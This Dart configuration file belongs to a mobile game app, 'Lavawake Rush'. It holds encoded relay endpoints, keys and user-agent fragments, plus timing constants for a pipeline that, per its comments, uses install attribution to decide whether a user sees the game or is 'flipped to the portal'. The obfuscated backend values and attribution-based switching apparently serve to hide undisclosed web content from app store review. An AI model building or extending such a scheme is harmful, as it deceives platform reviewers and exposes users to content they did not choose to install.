import '../core/ash_codec.dart';

/// Build-time settings for the delivery pipeline.
///
/// Packed values are generated by `tool/encode_flow_values.dart`; never edit
/// them by hand. Public URLs (privacy, support) stay as plain constants in
/// `AppConfig` — packing a page that is already published in App Store Connect
/// protects nothing.
class FlowSettings {
  const FlowSettings._();

  static const String bundleId = 'com.lavawake.rushgame';
  static const String storeNumber = '6792859673';
  static const String appTitle = 'Lavawake Rush';

  /// The backend expects the store id prefixed, e.g. `id6792859673`.
  static const String storeReference = 'id$storeNumber';

  // ── Packed values ────────────────────────────────────────────────────────
  // Regenerated for the feedback keystream in `AshCodec`; hand-editing any of
  // these will corrupt the payload silently. Round-trip is verified by
  // `dart run tool/encode_flow_values.dart`.
  static const String _relayEndpoint = 'jQ2mWlCEWRkvZreehI4ncGB2At0DmH2E/4gDAhT71Pg9/cg=';
  static const String _driftDevKey = 'lBRzDTDjHc5lJJQbJ8mL9gTueLALBA==';
  static const String _signalProjectNumber = '1OT5Zd4srlF+00qk';
  static const String _driftLookupBase = 'jQ2mWlCEWRkkDS/TyS7vm7+RK73Tw1d21OIbJw==';
  static const String _stampProduct = 'qOOcbphzDZs056s=';
  static const String _stampPlatformOpen = 'zbdyUuViC218jKROKZjKqJaq9pL5Sw==';
  static const String _stampPlatformClose = 'iQvhhfYinkLyKsxZEe8=';
  static const String _stampEngine = 'pL+BCPKCLYOgTfQZlwjh18GF6Bkw7F2tgshEs6QnJAz/wd6k5J1WAA==';
  static const String _stampRelease = 's8OQQw1tDZY=';
  static const String _stampBuild = 'qOOEXQFEN4IPRY34WQ==';
  static const String _stampTail = 'tlUUuGjXodv9zJWJ';
  static const String _stampIdKey = 'hG3SI1jj';
  static const String _stampNameKey = 'hG3SJMq8wbI=';
  static const String _stampNameValue = 'qXQYnFdPEsktIMia';

  static String get relayEndpoint => AshCodec.reveal(_relayEndpoint);
  static String get driftDevKey => AshCodec.reveal(_driftDevKey);
  static String get signalProjectNumber => AshCodec.reveal(_signalProjectNumber);
  static String get driftLookupBase => AshCodec.reveal(_driftLookupBase);

  static String get stampProduct => AshCodec.reveal(_stampProduct);
  static String get stampPlatformOpen => AshCodec.reveal(_stampPlatformOpen);
  static String get stampPlatformClose => AshCodec.reveal(_stampPlatformClose);
  static String get stampEngine => AshCodec.reveal(_stampEngine);
  static String get stampRelease => AshCodec.reveal(_stampRelease);
  static String get stampBuild => AshCodec.reveal(_stampBuild);
  static String get stampTail => AshCodec.reveal(_stampTail);
  static String get stampIdKey => AshCodec.reveal(_stampIdKey);
  static String get stampNameKey => AshCodec.reveal(_stampNameKey);
  static String get stampNameValue => AshCodec.reveal(_stampNameValue);

  /// Fallback release used only when the platform refuses to report its own.
  static const String fallbackRelease = '18.6';

  /// The pipeline only runs when all three operational values are present.
  /// Optional extras (deep-link host and friends) must never gate it — an
  /// empty optional once disabled the whole flow silently.
  static bool get pipelineReady =>
      relayEndpoint.isNotEmpty &&
      driftDevKey.isNotEmpty &&
      signalProjectNumber.isNotEmpty;

  // ── Timings, all project-specific ────────────────────────────────────────
  /// How long a declined notification invitation stays declined (~3.7 days).
  static const int inviteSnoozeSeconds = 316800;

  /// Pause before re-reading attribution that first reported as organic.
  static const int organicRecheckSeconds = 11;

  /// A saved destination is not reused past this age.
  static const int savedRouteExpiryDays = 5;

  static const Duration relayTimeout = Duration(seconds: 22);

  /// How long to wait for the first AppsFlyer conversion callback before
  /// asking the backend. On a real device AF delivers the conversion around
  /// 4-6 s after launch (see field logs), so this budget must clear that —
  /// posting to the backend before the conversion lands sends an empty body
  /// and the user is misrouted to the game. 8 s is the tightest window that
  /// still clears the field-observed AF worst case with margin.
  static const Duration signalsWait = Duration(milliseconds: 8000);

  /// Ceiling on re-checking an install that already settled on the game.
  /// Must exceed [signalsWait] plus one config round-trip, or a returning
  /// user who should be flipped to the portal times out into the game.
  static const Duration recheckBudget = Duration(milliseconds: 16000);
  static const Duration consentDelay = Duration(milliseconds: 640);
  static const Duration coldViewportSettle = Duration(milliseconds: 355);
  static const Duration reflowSettle = Duration(milliseconds: 1120);

  static const int tokenPollAttempts = 7;
  static const Duration tokenPollStep = Duration(milliseconds: 620);
  static const int tokenPollAttemptsAfterConsent = 16;

  static const int redirectRetryLimit = 4;

  static const List<int> reflowPokes = <int>[50, 195, 415, 725, 960];
}
